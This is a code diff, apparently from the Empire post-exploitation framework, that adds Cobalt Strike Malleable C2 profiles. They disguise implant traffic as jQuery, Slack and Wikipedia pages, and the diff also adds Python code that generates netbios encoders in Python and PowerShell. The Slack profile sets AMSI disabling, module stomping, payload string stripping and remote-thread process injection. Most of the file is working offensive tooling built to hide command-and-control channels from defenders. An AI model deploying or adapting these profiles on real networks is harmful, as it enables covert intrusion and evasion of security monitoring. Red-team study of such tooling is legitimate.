e)n=a[t],a!==(r=e[t])&&(l&&r&&(w.isPlainObject(r)||(i=Array.isArray(r)))?(i?(i=!1,o=n&&Array.isArray(n)?n:[]):o=n&&w.isPlainObject(n)?n:{},a[t]=w.extend(l,o,r)):void 0!==r&&(a[t]=r));return a},w.extend({expando:\"jQuery\"+(\"3.3.1\"+Math.random()).replace(/\\D/g,\"\"),isReady:!0,error:function(e){throw new Error(e)},noop:function(){},isPlainObject:function(e){var t,n;return!(!e||\"[object Object]\"!==c.call(e))&&(!(t=i(e))||\"function\"==typeof(n=f.call(t,\"constructor\")&&t.constructor)&&p.call(n)===d)},isEmptyObject:function(e){var t;for(t in e)return!1;return!0},globalEval:function(e){m(e)},each:function(e,t){var n,r=0;if(C(e)){for(n=e.length;r<n;r++)if(!1===t.call(e[r],r,e[r]))break}else for(r in e)if(!1===t.call(e[r],r,e[r]))break;return e},trim:function(e){return null==e?\"\":(e+\"\").replace(T,\"\")},makeArray:function(e,t){var n=t||[];return null!=e&&(C(Object(e))?w.merge(n,\"string\"==typeof e?[e]:e):s.call(n,e)),n},inArray:function(e,t,n){return null==t?-1:u.call(t,e,n)},merge:function(e,t){for(var n=+t.length,r=0,i=e.length;r<n;r++)e[i++]=t[r];return e.length=i,e},grep:function(e,t,n){for(var r,i=[],o=0,a=e.length,s=!n;o<a;o++)(r=!t(e[o],o))!==s&&i.push(e[o]);return i},map:function(e,t,n){var r,i,o=0,s=[];if(C(e))for(r=e.length;o<r;o++)null!=(i=t(e[o],o,n))&&s.push(i);else for(o in e)null!=(i=t(e[o],o,n))&&s.push(i);return a.apply([],s)},guid:1,support:h}),\"function\"==typeof Symbol&&(w.fn[Symbol.iterator]=n[Symbol.iterator]),w.each(\"Boolean Number String Function Array Date RegExp Object Error Symbol\".split(\" \"),function(e,t){l[\"[object \"+t+\"]\"]=t.toLowerCase()});function C(e){var t=!!e&&\"length\"in e&&e.length,n=x(e);return!g(e)&&!y(e)&&(\"array\"===n||0===t||\"number\"==typeof t&&t>0&&t-1 in e)}var E=function(e){var t,n,r,i,o,a,s,u,l,c,f,p,d,h,g,y,v,m,x,b=\"sizzle\"+1*new Date,w=e.document,T=0,C=0,E=ae(),k=ae(),S=ae(),D=function(e,t){return e===t&&(f=!0),0},N={}.hasOwnProperty,A=[],j=A.pop,q=A.push,L=A.push,H=A.slice,O=function(e,t){for(var n=0,r=e.length;n<r;n++)if(e[n]===t)return n;return-1},P=\"\r"; | |
650 | # # 1st Line | |
651 | # prepend "/*! jQuery v3.3.1 | (c) JS Foundation and other contributors | jquery.org/license */"; | |
652 | # append "\".(o=t.documentElement,Math.max(t.body[\"scroll\"+e],o[\"scroll\"+e],t.body[\"offset\"+e],o[\"offset\"+e],o[\"client\"+e])):void 0===i?w.css(t,n,s):w.style(t,n,i,s)},t,a?i:void 0,a)}})}),w.each(\"blur focus focusin focusout resize scroll click dblclick mousedown mouseup mousemove mouseover mouseout mouseenter mouseleave change select submit keydown keypress keyup contextmenu\".split(\" \"),function(e,t){w.fn[t]=function(e,n){return arguments.length>0?this.on(t,null,e,n):this.trigger(t)}}),w.fn.extend({hover:function(e,t){return this.mouseenter(e).mouseleave(t||e)}}),w.fn.extend({bind:function(e,t,n){return this.on(e,null,t,n)},unbind:function(e,t){return this.off(e,null,t)},delegate:function(e,t,n,r){return this.on(t,e,n,r)},undelegate:function(e,t,n){return 1===arguments.length?this.off(e,\"**\"):this.off(t,e||\"**\",n)}}),w.proxy=function(e,t){var n,r,i;if(\"string\"==typeof t&&(n=e[t],t=e,e=n),g(e))return r=o.call(arguments,2),i=function(){return e.apply(t||this,r.concat(o.call(arguments)))},i.guid=e.guid=e.guid||w.guid++,i},w.holdReady=function(e){e?w.readyWait++:w.ready(!0)},w.isArray=Array.isArray,w.parseJSON=JSON.parse,w.nodeName=N,w.isFunction=g,w.isWindow=y,w.camelCase=G,w.type=x,w.now=Date.now,w.isNumeric=function(e){var t=w.type(e);return(\"number\"===t||\"string\"===t)&&!isNaN(e-parseFloat(e))},\"function\"==typeof define&&define.amd&&define(\"jquery\",[],function(){return w});var Jt=e.jQuery,Kt=e.$;return w.noConflict=function(t){return e.$===w&&(e.$=Kt),t&&e.jQuery===w&&(e.jQuery=Jt),w},t||(e.jQuery=e.$=w),w});"; | |
653 | # print; | |
654 | # } | |
655 | # } | |
656 | # } | |
657 | ||
658 | ## CS 4.0 Profile Variants | |
659 | ## Variants are selectable when configuring an HTTP or HTTPS Beacon listener. Variants allow each HTTP or HTTPS Beacon listener tied to a single team server to have network IOCs that differ from each other. | |
660 | ## You may add profile "variants" by specifying additional http-get, http-post, http-stager, and https-certifcate blocks with the following syntax: | |
661 | ## [block name] "variant name" { ... }. Here's a variant http-get block named "My Variant": | |
662 | ## http-get "My Variant" { | |
663 | ## client { | |
664 | ## parameter "bar" "blah"; | |
665 |
0 | #slack profile | |
1 | #used a MS dev group from a 'top slack groups' list | |
2 | #xx0hcd | |
3 | ||
4 | ||
5 | set sleeptime "30000"; | |
6 | set jitter "20"; | |
7 | set useragent "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko)"; | |
8 | set dns_idle "8.8.8.8"; | |
9 | set maxdns "235"; | |
10 | ||
11 | #custom cert | |
12 | #https-certificate { | |
13 | # set keystore "your_store_file.store"; | |
14 | # set password "your_store_pass"; | |
15 | #} | |
16 | ||
17 | http-config { | |
18 | # set headers "Server, Content-Type, Cache-Control, Connection"; | |
19 | # header "Content-Type" "text/html;charset=UTF-8"; | |
20 | # header "Connection" "close"; | |
21 | # header "Cache-Control" "max-age=2"; | |
22 | # header "Server" "nginx"; | |
23 | #set "true" if teamserver is behind redirector | |
24 | set trust_x_forwarded_for "false"; | |
25 | } | |
26 | ||
27 | http-get { | |
28 | ||
29 | set uri "/messages/C0527B0NM"; | |
30 | ||
31 | client { | |
32 | ||
33 | # header "Host" "msdevchat.slack.com"; | |
34 | header "Accept" "*/*"; | |
35 | header "Accept-Language" "en-US"; | |
36 | header "Connection" "close"; | |
37 | ||
38 | ||
39 | metadata { | |
40 | base64url; | |
41 | ||
42 | append ";_ga=GA1.2.875"; | |
43 | append ";__ar_v4=%8867UMDGS643"; | |
44 | prepend "d="; | |
45 | # prepend "cvo_sid1=R456BNMD64;"; | |
46 | prepend "_ga=GA1.2.875;"; | |
47 | prepend "b=.12vPkW22o;"; | |
48 | header "Cookie"; | |
49 | ||
50 | } | |
51 | ||
52 | } | |
53 | ||
54 | server { | |
55 | ||
56 | header "Content-Type" "text/html; charset=utf-8"; | |
57 | header "Connection" "close"; | |
58 | header "Server" "Apache"; | |
59 | header "X-XSS-Protection" "0"; | |
60 | header "Strict-Transport-Security" "max-age=31536000; includeSubDomains; preload"; | |
61 | header "Referrer-Policy" "no-referrer"; | |
62 | header "X-Slack-Backend" "h"; | |
63 | header "Pragma" "no-cache"; | |
64 | header "Cache-Control" "private, no-cache, no-store, must-revalidate"; | |
65 | header "X-Frame-Options" "SAMEORIGIN"; | |
66 | header "Vary" "Accept-Encoding"; | |
67 | header "X-Via" "haproxy-www-w6k7"; | |
68 | ||
69 | ||
70 | output { | |
71 | ||
72 | base64url; | |
73 | ||
74 | prepend "<!DOCTYPE html> | |
75 | <html lang=\"en-US\" class=\"supports_custom_scrollbar\"> | |
76 | ||
77 | <head> | |
78 | ||
79 | <meta charset=\"utf-8\"> | |
80 | <meta http-equiv=\"X-UA-Compatible\" content=\"IE=edge,chrome=1\"> | |
81 | <meta name=\"referrer\" content=\"no-referrer\"> | |
82 | <meta name=\"superfish\" content=\"nofish\"> | |
83 | <title>Microsoft Developer Chat Slack</title> | |
84 | <meta name=\"author\" content=\"Slack\"> | |
85 | ||
86 | ||
87 | <link rel=\"dns-prefetch\" href=\"https://a.slack-edge.com?id="; | |
88 | ||
89 | append "\"> </script>"; | |
90 | ||
91 | append "<div id=\"client-ui\" class=\"container-fluid sidebar_theme_\"\"\"> | |
92 | ||
93 | ||
94 | <div id=\"banner\" class=\"hidden\" role=\"complementary\" aria-labelledby=\"notifications_banner_aria_label\"> | |
95 | <h1 id=\"notifications_banner_aria_label\" class=\"offscreen\">Notifications Banner</h1> | |
96 | ||
97 | <div id=\"notifications_banner\" class=\"banner sk_fill_blue_bg hidden\"> | |
98 | Slack needs your permission to <button type=\"button\" class=\"btn_link\">enable desktop notifications</button>. <button type=\"button\" class=\"btn_unstyle banner_dismiss ts_icon ts_icon_times_circle\" data-action=\"dismiss_banner\" aria-label=\"Dismiss\"></button> | |
99 | </div> | |
100 | ||
101 | <div id=\"notifications_dismiss_banner\" class=\"banner seafoam_green_bg hidden\"> | |
102 | We strongly recommend enabling desktop notifications if you’ll be using Slack on this computer. <span class=\"inline_block no_wrap\"> | |
103 | <button type=\"button\" class=\"btn_link\" onclick=\"TS.ui.banner.close(); TS.ui.banner.growlsPermissionPrompt();\">Enable notifications</button> • | |
104 | <button type=\"button\" class=\"btn_link\" onclick=\"TS.ui.banner.close()\">Ask me next time</button> • | |
105 | <button type=\"button\" class=\"btn_link\" onclick=\"TS.ui.banner.closeNagAndSetCookie()\">Never ask again on this computer</button> | |
106 | </span> | |
107 | </div>"; | |
108 | ||
109 | print; | |
110 | } | |
111 | } | |
112 | } | |
113 | ||
114 | http-post { | |
115 | ||
116 | set uri "/api/api.test"; | |
117 | ||
118 | client { | |
119 | ||
120 | # header "Host" "msdevchat.slack.com"; | |
121 | header "Accept" "*/*"; | |
122 | header "Accept-Language" "en-US"; | |
123 | ||
124 | output { | |
125 | base64url; | |
126 | ||
127 | append ";_ga=GA1.2.875"; | |
128 | append "__ar_v4=%8867UMDGS643"; | |
129 | prepend "d="; | |
130 | # prepend "cvo_sid1=R456BNMD64;"; | |
131 | prepend "_ga=GA1.2.875;"; | |
132 | prepend "b=.12vPkW22o;"; | |
133 | header "Cookie"; | |
134 | ||
135 | ||
136 | } | |
137 | ||
138 | ||
139 | id { | |
140 | #not sure on this, just trying to blend it in. | |
141 | base64url; | |
142 | prepend "GA1."; | |
143 | header "_ga"; | |
144 | ||
145 | } | |
146 | } | |
147 | ||
148 | server { | |
149 | ||
150 | header "Content-Type" "application/json; charset=utf-8"; | |
151 | header "Connection" "close"; | |
152 | header "Server" "Apache"; | |
153 | header "Strict-Transport-Security" "max-age=31536000; includeSubDomains; preload"; | |
154 | header "Referrer-Policy" "no-referrer"; | |
155 | header "X-Content-Type-Options" "nosniff"; | |
156 | header "X-Slack-Req-Id" "6319165c-f976-4d0666532"; | |
157 | header "X-XSS-Protection" "0"; | |
158 | header "X-Slack-Backend" "h"; | |
159 | header "Vary" "Accept-Encoding"; | |
160 | header "Access-Control-Allow-Origin" "*"; | |
161 | header "X-Via" "haproxy-www-6g1x"; | |
162 | ||
163 | ||
164 | output { | |
165 | base64; | |
166 | ||
167 | prepend "{\"ok\":true,\"args\":{\"user_id\":\"LUMK4GB8C\",\"team_id\":\"T0527B0J3\",\"version_ts\":\""; | |
168 | append "\"},\"warning\":\"superfluous_charset\",\"response_metadata\":{\"warnings\":[\"superfluous_charset\"]}}"; | |
169 | ||
170 | print; | |
171 | } | |
172 | } | |
173 | } | |
174 | ||
175 | http-stager { | |
176 | ||
177 | set uri_x86 "/messages/DALBNSf25"; | |
178 | set uri_x64 "/messages/DALBNSF25"; | |
179 | ||
180 | client { | |
181 | header "Accept" "*/*"; | |
182 | header "Accept-Language" "en-US,en;q=0.5"; | |
183 | header "Accept-Encoding" "gzip, deflate"; | |
184 | header "Connection" "close"; | |
185 | } | |
186 | ||
187 | server { | |
188 | header "Content-Type" "text/html; charset=utf-8"; | |
189 | header "Connection" "close"; | |
190 | header "Server" "Apache"; | |
191 | header "X-XSS-Protection" "0"; | |
192 | header "Strict-Transport-Security" "max-age=31536000; includeSubDomains; preload"; | |
193 | header "Referrer-Policy" "no-referrer"; | |
194 | header "X-Slack-Backend" "h"; | |
195 | header "Pragma" "no-cache"; | |
196 | header "Cache-Control" "private, no-cache, no-store, must-revalidate"; | |
197 | header "X-Frame-Options" "SAMEORIGIN"; | |
198 | header "Vary" "Accept-Encoding"; | |
199 | header "X-Via" "haproxy-www-suhx"; | |
200 | ||
201 | } | |
202 | ||
203 | ||
204 | } | |
205 | ||
206 | ###Malleable PE Options### | |
207 | ||
208 | post-ex { | |
209 | ||
210 | set spawnto_x86 "%windir%\\syswow64\\gpupdate.exe"; | |
211 | set spawnto_x64 "%windir%\\sysnative\\gpupdate.exe"; | |
212 | ||
213 | set obfuscate "true"; | |
214 | ||
215 | set smartinject "true"; | |
216 | ||
217 | set amsi_disable "true"; | |
218 | ||
219 | } | |
220 | ||
221 | #used peclone on wwanmm.dll. | |
222 | #don't use 'set image_size_xx' if using 'set module_xx' | |
223 | stage { | |
224 | set checksum "0"; | |
225 | set compile_time "25 Oct 2016 01:57:23"; | |
226 | set entry_point "170000"; | |
227 | # set image_size_x86 "6586368"; | |
228 | # set image_size_x64 "6586368"; | |
229 | # set name "WWanMM.dll"; | |
230 | set userwx "false"; | |
231 | set cleanup "true"; | |
232 | set stomppe "true"; | |
233 | set obfuscate "true"; | |
234 | set rich_header "\xee\x50\x19\xcf\xaa\x31\x77\x9c\xaa\x31\x77\x9c\xaa\x31\x77\x9c\xa3\x49\xe4\x9c\x84\x31\x77\x9c\x1e\xad\x86\x9c\xae\x31\x77\x9c\x1e\xad\x85\x9c\xa7\x31\x77\x9c\xaa\x31\x76\x9c\x08\x31\x77\x9c\x1e\xad\x98\x9c\xa3\x31\x77\x9c\x1e\xad\x84\x9c\x98\x31\x77\x9c\x1e\xad\x99\x9c\xab\x31\x77\x9c\x1e\xad\x80\x9c\x6d\x31\x77\x9c\x1e\xad\x9a\x9c\xab\x31\x77\x9c\x1e\xad\x87\x9c\xab\x31\x77\x9c\x52\x69\x63\x68\xaa\x31\x77\x9c\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"; | |
235 | ||
236 | ||
237 | #module stomp | |
238 | ||
239 | #don't use 'set image_size_xx' if using 'set module_xx' | |
240 | set module_x86 "wwanmm.dll"; | |
241 | set module_x64 "wwanmm.dll"; | |
242 | ||
243 | transform-x86 { | |
244 | prepend "\x90\x90\x90"; | |
245 | strrep "ReflectiveLoader" ""; | |
246 | strrep "beacon.dll" ""; | |
247 | } | |
248 | ||
249 | transform-x64 { | |
250 | prepend "\x90\x90\x90"; | |
251 | strrep "ReflectiveLoader" ""; | |
252 | strrep "beacon.x64.dll" ""; | |
253 | } | |
254 | ||
255 | } | |
256 | process-inject { | |
257 | ||
258 | set allocator "NtMapViewOfSection"; | |
259 | ||
260 | set min_alloc "16700"; | |
261 | ||
262 | set userwx "false"; | |
263 | ||
264 | set startrwx "true"; | |
265 | ||
266 | transform-x86 { | |
267 | prepend "\x90\x90\x90"; | |
268 | } | |
269 | transform-x64 { | |
270 | prepend "\x90\x90\x90"; | |
271 | } | |
272 | ||
273 | execute { | |
274 | CreateThread "ntdll!RtlUserThreadStart"; | |
275 | CreateThread; | |
276 | NtQueueApcThread; | |
277 | CreateRemoteThread; | |
278 | RtlCreateUserThread; | |
279 | } | |
280 | } |
0 | # | |
1 | # Wikipedia | |
2 | # | |
3 | # Author: @bluscreenofjeff | |
4 | # | |
5 | ||
6 | #set https cert info | |
7 | https-certificate { | |
8 | set CN "*.wikipedia.org"; #Common Name | |
9 | set C "US"; #Country | |
10 | set L "San Francisco"; #Locality | |
11 | set OU "Wikimedia Foundation Inc"; #Organizational Unit Name | |
12 | set ST "CA"; #State or Province | |
13 | set validity "365"; #Number of days the cert is valid for | |
14 | } | |
15 | ||
16 | #default Beacon sleep duration and jitter | |
17 | set sleeptime "60000"; | |
18 | set jitter "20"; | |
19 | ||
20 | #default useragent for HTTP comms | |
21 | set useragent "Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko"; | |
22 | ||
23 | #IP address used to indicate no tasks are available to DNS Beacon | |
24 | set dns_idle "8.8.4.4"; | |
25 | ||
26 | #Force a sleep prior to each individual DNS request. (in milliseconds) | |
27 | set dns_sleep "0"; | |
28 | ||
29 | #Maximum length of hostname when uploading data over DNS (0-255) | |
30 | set maxdns "235"; | |
31 | ||
32 | http-get { | |
33 | ||
34 | set uri "/w/index.php"; | |
35 | ||
36 | client { | |
37 | ||
38 | header "Host" "en.wikipedia.org"; | |
39 | header "Accept" "text/html,application/xhtml+xml,application/xml;"; | |
40 | header "Referer" "https://en.wikipedia.org/wiki/Main_Page"; | |
41 | ||
42 | #session metadata | |
43 | metadata { | |
44 | base64url; | |
45 | parameter "search"; | |
46 | } | |
47 | parameter "title" "Special%3ASearch"; | |
48 | parameter "go" "Go"; | |
49 | } | |
50 | ||
51 | ||
52 | server { | |
53 | ||
54 | header "Server" "mw1178.eqiad.wmnet"; | |
55 | header "X-Powered-By" "HHVM/3.12.7"; | |
56 | header "X-Content-Type-Options" "nosniff"; | |
57 | header "P3P" "CP=This is not a P3P policy! See https://en.wikipedia.org/wiki/Special:CentralAutoLogin/P3P for more info."; | |
58 | header "Vary" "Accept-Encoding,X-Forwarded-Proto,Cookie,Authorization"; | |
59 | ||
60 | #Beacon's tasks | |
61 | output { | |
62 | netbios; | |
63 | prepend "<!DOCTYPE html><html class=client-nojs lang=en dir=ltr><head><meta charset=UTF-8/><title>Wikipedia</title><script>document.documentElement.className = document.documentElement.className.replace( /(^|s)client-nojs(s|$)/, $1client-js$2 );</script><script>(window.RLQ=window.RLQ||[]).push(function(){mw.config.set({wgCanonicalNamespace:,wgCanonicalSpecialPageName:false,wgNamespaceNumber:0,,wgBetaFeaturesFeatures:[],wgMediaViewerOnClick:true,wgMediaViewerEnabledByDefault:true,wgVisualEditor:{pageLanguageCode:en,pageLanguageDir:ltr,usePageImages:true,usePageDescriptions:true},wgPreferredVariant:en,wgMFDisplayWikibaseDescriptions:{search:true,nearby:true,watchlist:true,tagline:false},wgRelatedArticles:null,wgRelatedArticlesUseCirrusSearch:true,wgRelatedArticlesOnlyUseCirrusSearch:false,wgULSCurrentAutonym:English,wgNoticeProject:wikipedia,wgCentralNoticeCookiesToDelete:[],wgCentralNoticeCategoriesUsingLegacy:[Fundraising,fundraising],wgCategoryTreePageCategoryOptions:{mode:0,hideprefix:20,showcount:true,namespaces:false},wgWikibaseItemId:"; | |
64 | ||
65 | append ",wgCentralAuthMobileDomain:false,wgVisualEditorToolbarScrollOffset:0,wgEditSubmitButtonLabelPublish:false});mw.loader.state({ext.globalCssJs.user.styles:ready,ext.globalCssJs.site.styles:ready,site.styles:ready,noscript:ready,user.styles:ready,user:ready,user.options:loading,user.tokens:loading,wikibase.client.init:ready,ext.visualEditor.desktopArticleTarget.noscript:ready,ext.uls.interlanguage:ready,ext.wikimediaBadges:ready,mediawiki.legacy.shared:ready,mediawiki.legacy.commonPrint:ready,mediawiki.sectionAnchor:ready,mediawiki.skinning.interface:ready,skins.vector.styles:ready,ext.globalCssJs.user:ready,ext.globalCssJs.site:ready});mw.loader.implement(user.options@0j3lz3q,function($,jQuery,require,module){mw.user.options.set({variant:en});});mw.loader.implement(user.tokens@1dqfd7l,function ( $, jQuery, require, module )</script><link rel=stylesheet href=/w/load.php?debug=false&lang=en&modules=ext.uls.interlanguage%7Cext.visualEditor.desktopArticleTarget.noscript%7Cext.wikimediaBadges%7Cmediawiki.legacy.commonPrint%2Cshared%7Cmediawiki.sectionAnchor%7Cmediawiki.skinning.interface%7Cskins.vector.styles%7Cwikibase.client.init&only=styles&skin=vector/><script async= src=/w/load.php?debug=false&lang=en&modules=startup&only=scripts&skin=vector></script><meta name=ResourceLoaderDynamicStyles content=/><link rel=stylesheet href=/w/load.php?debug=false&lang=en&modules=site.styles&only=styles&skin=vector/>"; | |
66 | ||
67 | print; | |
68 | } | |
69 | } | |
70 | } | |
71 | ||
72 | http-post { | |
73 | ||
74 | set uri "/wiki"; | |
75 | set verb "GET"; | |
76 | ||
77 | client { | |
78 | ||
79 | header "Host" "en.wikipedia.org"; | |
80 | header "Accept" "text/html,application/xhtml+xml,application/xml;"; | |
81 | ||
82 | #session ID | |
83 | id { | |
84 | base64url; | |
85 | prepend "/"; | |
86 | uri-append; | |
87 | } | |
88 | ||
89 | ||
90 | #Beacon's responses | |
91 | output { | |
92 | base64url; | |
93 | prepend "https://en.wikipedia.org/w/index.php?search="; | |
94 | append "&title=Special%3ASearch&go=Go"; | |
95 | header "Referer"; | |
96 | } | |
97 | } | |
98 | ||
99 | server { | |
100 | ||
101 | header "Server" "mw1178.eqiad.wmnet"; | |
102 | header "X-Powered-By" "HHVM/3.12.7"; | |
103 | header "X-Content-Type-Options" "nosniff"; | |
104 | header "P3P" "CP=This is not a P3P policy! See https://en.wikipedia.org/wiki/Special:CentralAutoLogin/P3P for more info."; | |
105 | header "Vary" "Accept-Encoding,X-Forwarded-Proto,Cookie,Authorization"; | |
106 | ||
107 | #empty | |
108 | output { | |
109 | ||
110 | prepend "<body class=mediawiki ltr sitedir-ltr mw-hide-empty-elt ns-0 ns-subject page-Test rootpage-Test skin-vector action-view><div id=mw-page-base class=noprint></div><div id=mw-head-base class=noprint></div><div id=content class=mw-body role=main><a id=top></a><div id=siteNotice><!-- CentralNotice --></div><div class=mw-indicators><div id=mw-indicator-pp-default class=mw-indicator><a href=/wiki/Wikipedia:Protection_policy#semi title=This article is semi-protected due to vandalism><img alt=Page semi-protected src=//upload.wikimedia.org/wikipedia/commons/thumb/f/fc/Padlock-silver.svg/20px-Padlock-silver.svg.png width=20 height=20 srcset=//upload.wikimedia.org/wikipedia/commons/thumb/f/fc/Padlock-silver.svg/30px-Padlock-silver.svg.png 1.5x, //upload.wikimedia.org/wikipedia/commons/thumb/f/fc/Padlock-silver.svg/40px-Padlock-silver.svg.png 2x data-file-width=128 data-file-height=128 /></a></div></div><h1 id=firstHeading class=firstHeading lang=en>Wikipedia</h1><div id=bodyContent class=mw-body-content><div id=siteSub>From Wikipedia, the free encyclopedia</div><div id=contentSub><span class=mw-redirectedfrom>ᅡᅠᅡᅠ(Redirected from <a href=/w/index.php?title=Testing&redirect=no class=mw-redirect title=Testing>Testing</a>)</span></div><div id=jump-to-nav class=mw-jump>Jump to:<a href=#mw-head>navigation</a>,<a href=#p-search>search</a></div><div id=mw-content-text lang=en dir=ltr class=mw-content-ltr><script>function mfTempOpenSection(id){var block=document.getElementById(mf-section-+id);block.className+= open-block;block.previousSibling.className+= open-block;}</script><table class=plainlinks metadata ambox ambox-content role=presentation><tr><td class=mbox-image><div style=width:52px><img alt= src=//upload.wikimedia.org/wikipedia/commons/thumb/e/e9/Sandbox_Not.svg/50px-Sandbox_Not.svg.png width=50 height=50 srcset=//upload.wikimedia.org/wikipedia/commons/thumb/e/e9/Sandbox_Not.svg/75px-Sandbox_Not.svg.png 1.5x, //upload.wikimedia.org/wikipedia/commons/thumb/e/e9/Sandbox_Not.svg/100px-Sandbox_Not.svg.png 2x data-file-width=766 data-file-height=766 /></div></td>"; | |
111 | ||
112 | print; | |
113 | } | |
114 | } | |
115 | } | |
116 | ||
117 | #change the stager server | |
118 | http-stager { | |
119 | server { | |
120 | header "Content-Type" "text/html"; | |
121 | } | |
122 | } |
14 | 14 | - [threatexpress](https://github.com/threatexpress/malleable-c2) |
15 | 15 | - [yeyintminthuhtut](https://github.com/yeyintminthuhtut/Malleable-C2-Profiles-Collection) |
16 | 16 | - [bluscreenofjeff](https://github.com/bluscreenofjeff/MalleableC2Profiles) |
17 | - [skgray](https://github.com//Malleable-C2) | |
18 | 17 | - [mhaskar](https://github.com/mhaskar/MalleableC2-Profiles) |
19 | 18 | |
20 | 19 | ## Documentation |
21 | 20 | - [A Deep Dive into Cobalt Strike Malleable C2](https://posts.specterops.io/a-deep-dive-into-cobalt-strike-malleable-c2-6660e33b0e0b) |
22 | - [Malleable C2 Documenation](https://www.cobaltstrike.com/help-malleable-c2) | |
21 | - [Malleable C2 Documentation](https://www.cobaltstrike.com/help-malleable-c2) | |
22 | - [Empire: Malleable C2 Profiles](https://www.bc-security.org/post/empire-malleable-c2-profiles/) |
18 | 18 | from datetime import datetime, timezone |
19 | 19 | from flask_socketio import SocketIO |
20 | 20 | |
21 | VERSION = "3.7.1 BC Security Fork" | |
21 | VERSION = "3.7.2 BC Security Fork" | |
22 | 22 | |
23 | 23 | from pydispatch import dispatcher |
24 | 24 |
271 | 271 | netbios algorithm.""" |
272 | 272 | self.transform = lambda data: netbios_transform(data) |
273 | 273 | self.transform_r = lambda data: netbios_transform_r(data) |
274 | self.generate_python = lambda var: "f_ord=ord if __import__('sys').version_info[0]<3 else int;%(var)s=''.join([chr((f_ord(_)>>4)+0x61)+chr((f_ord(_)&0xF)+0x61) for _ in %(var)s])\n" % {"var":var} | |
275 | self.generate_python_r = lambda var: "f_ord=ord if __import__('sys').version_info[0]<3 else int;%(var)s=''.join([chr(((f_ord(%(var)s[_])-0x61)<<4)|((f_ord(%(var)s[_+1])-0x61)&0xF)) for _ in range(0,len(%(var)s),2)])\n" % {"var":var} | |
276 | self.generate_powershell = lambda var: netbios_powershell(var) | |
277 | self.generate_powershell_r = lambda var: netbios_powershell_r(var) | |
274 | 278 | |
275 | 279 | def netbios_transform(data): |
276 | 280 | if isinstance(data, str): |
284 | 288 | r = "".join([chr(((data[i]-0x61)<<4)|((data[i+1]-0x61)&0xF)) for i in range(0, len(data), 2)]) |
285 | 289 | return r.encode('latin-1') |
286 | 290 | |
287 | self.generate_python = lambda var: "f_ord=ord if __import__('sys').version_info[0]<3 else int;%(var)s=''.join([chr((f_ord(_)>>4)+0x61)+chr((f_ord(_)&0xF)+0x61) for _ in %(var)s])\n" % {"var":var} | |
288 | self.generate_python_r = lambda var: "f_ord=ord if __import__('sys').version_info[0]<3 else int;%(var)s=''.join([chr(((f_ord(%(var)s[_])-0x61)<<4)|((f_ord(%(var)s[_+1])-0x61)&0xF)) for _ in range(0,len(%(var)s),2)])\n" % {"var":var} | |
289 | self.generate_powershell = lambda var: "%(var)s=[System.Text.Encoding]::Default.GetString($(for($_=0;$_ -lt %(var)s.length;$_++){([System.Text.Encoding]::Default.GetBytes(%(var)s)[$_] -shr 4)+97;([System.Text.Encoding]::Default.GetBytes(%(var)s)[$_] -band 15)+97;}));" % {"var":var} | |
290 | self.generate_powershell_r = lambda var: "%(var)s=[System.Text.Encoding]::Default.GetString($(for($_=0;$_ -lt %(var)s.length;$_+=2){(([System.Text.Encoding]::Default.GetBytes(%(var)s)[$_]-97) -shl 4) -bor (([System.Text.Encoding]::Default.GetBytes(%(var)s)[$_+1]-97) -band 15);}));" % {"var":var} | |
291 | def netbios_powershell(var): | |
292 | return "$data2=[System.Text.Encoding]::Default.GetBytes(%(var)s);%(var)s=[System.Text.Encoding]::Default.GetString($(for($i=0;$i -lt %(var)s.Length;$i++){($data2[$i] -shr 4)+97;($data2[$i] -band 15)+97;}));" % {"var": var} | |
293 | ||
294 | def netbios_powershell_r(var): | |
295 | return "$data2=[System.Text.Encoding]::Default.GetBytes(%(var)s);%(var)s=[System.Text.Encoding]::Default.GetString($(for($i=0;$i -lt %(var)s.Length;$i+=2){($data2[$i]-97 -shl 4) -bor ($data2[$i+1]-97 -band 15);}));" % {"var":var} | |
291 | 296 | |
292 | 297 | def _netbiosu(self): |
293 | 298 | """Configure the `netbiosu` Transform, which encodes an arbitrary input using the upper-case |
294 | 299 | netbios algorithm.""" |
295 | self.transform = lambda data: netbios_transform(data) | |
296 | self.transform_r = lambda data: netbios_transform_r(data) | |
297 | ||
298 | def netbios_transform(data): | |
300 | self.transform = lambda data: netbiosu_transform(data) | |
301 | self.transform_r = lambda data: netbiosu_transform_r(data) | |
302 | self.generate_python = lambda var: "f_ord=ord if __import__('sys').version_info[0]<3 else int;%(var)s=''.join([chr((f_ord(_)>>4)+0x41)+chr((f_ord(_)&0xF)+0x41) for _ in %(var)s])\n" % {"var":var} | |
303 | self.generate_python_r = lambda var: "f_ord=ord if __import__('sys').version_info[0]<3 else int;%(var)s=''.join([chr(((f_ord(%(var)s[_])-0x41)<<4)|((f_ord(%(var)s[_+1])-0x41)&0xF)) for _ in range(0,len(%(var)s),2)])\n" % {"var":var} | |
304 | self.generate_powershell = lambda var: netbiosu_powershell(var) | |
305 | self.generate_powershell_r = lambda var: netbiosu_powershell_r(var) | |
306 | ||
307 | def netbiosu_transform(data): | |
299 | 308 | if isinstance(data, str): |
300 | 309 | data = data.encode('latin-1') |
301 | 310 | r = "".join([chr((c>>4)+0x41)+chr((c&0xF)+0x41) for c in data]) |
302 | 311 | return r.encode('latin-1') |
303 | 312 | |
304 | def netbios_transform_r(data): | |
313 | def netbiosu_transform_r(data): | |
305 | 314 | if isinstance(data, str): |
306 | 315 | data = data.encode('latin-1') |
307 | 316 | r = "".join([chr(((data[i]-0x41)<<4)|((data[i+1]-0x41)&0xF)) for i in range(0, len(data), 2)]) |
308 | 317 | return r.encode('latin-1') |
309 | 318 | |
310 | self.generate_python = lambda var: "f_ord=ord if __import__('sys').version_info[0]<3 else int;%(var)s=''.join([chr((f_ord(_)>>4)+0x41)+chr((f_ord(_)&0xF)+0x41) for _ in %(var)s])\n" % {"var":var} | |
311 | self.generate_python_r = lambda var: "f_ord=ord if __import__('sys').version_info[0]<3 else int;%(var)s=''.join([chr(((f_ord(%(var)s[_])-0x41)<<4)|((f_ord(%(var)s[_+1])-0x41)&0xF)) for _ in range(0,len(%(var)s),2)])\n" % {"var":var} | |
